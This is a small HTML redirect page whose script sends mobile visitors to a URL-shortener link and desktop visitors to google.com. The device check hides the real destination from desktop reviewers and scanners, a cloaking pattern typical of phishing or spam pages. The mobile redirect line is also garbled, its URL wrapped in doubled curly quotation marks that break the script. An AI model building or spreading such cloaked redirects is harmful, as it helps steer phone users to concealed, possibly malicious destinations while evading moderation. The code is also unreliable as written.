<!DOCTYPE html>

<html lang="ja">

<head>

<meta charset="UTF-8">

<title>Redirecting...</title>

<script>

   

    var ua = navigator.userAgent || navigator.vendor || window.opera;

    var isMobile = /iPhone|iPod|Android.*Mobile|Windows Phone|BlackBerry|Opera Mini/i.test(ua);


    if (isMobile) {

     

      window.location.replace(“”https://emoemo.short.gy/YyWtAG””);

    } else {

     

      window.location.replace("https://www.google.com/");

    }

  </script>

</head>

<body>

</body>

</html>